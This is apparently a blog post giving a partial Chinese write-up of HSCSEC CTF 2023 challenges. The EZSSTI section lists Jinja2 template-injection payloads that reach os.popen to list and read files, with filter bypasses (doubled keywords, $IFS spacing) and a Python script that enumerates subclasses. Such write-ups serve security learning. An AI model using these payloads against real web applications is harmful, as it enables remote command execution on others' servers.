HSCSEC CTF 2023部分WP

EZSSTI

?name={{''.__class__.__mro__[-1].__subclasses__()}}
查看所有子类

from requests import *
for i in range(300):
    url="http://4dcc7f0f-0e07-49e1-b2c8-b9ce9de9c125.race-node.hscsec.cn:8080/?name={{[].__class__.__mro__[-1].__subclasses__()[%s]}}"%i
    m=get(url)
    print(f"{i}:{m.text}")

找到这个类
?name={{''.class.mro[-1].subclasses()[132].init.globals.popen('ls /').read()}}
发现报错，猜测是把popen替换成空，后面测试发现不能有空格
?name={{''.class.mro[-1].subclasses()[132].init.globals.poppopenen('ls /').read()}}
?name={{''.class.mro[-1].subclasses()[132].init.globals.ppopenopen('cat$IFS$9/flaflagg').read()}}

EASYPHY

发现这个页面，有点像是文件包含，再加上后面的文件上传后缀没办法绕过，基本就是了
system那一系列传不上去，

然后文件包含一下即可

EZSYFLASK

tips

posted @ 2023-02-12 16:17 V3g3t4ble 阅读(178) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

V3g3t4ble's Blog

HSCSEC CTF 2023部分WP

EZSSTI

EASYPHY

EZSYFLASK

公告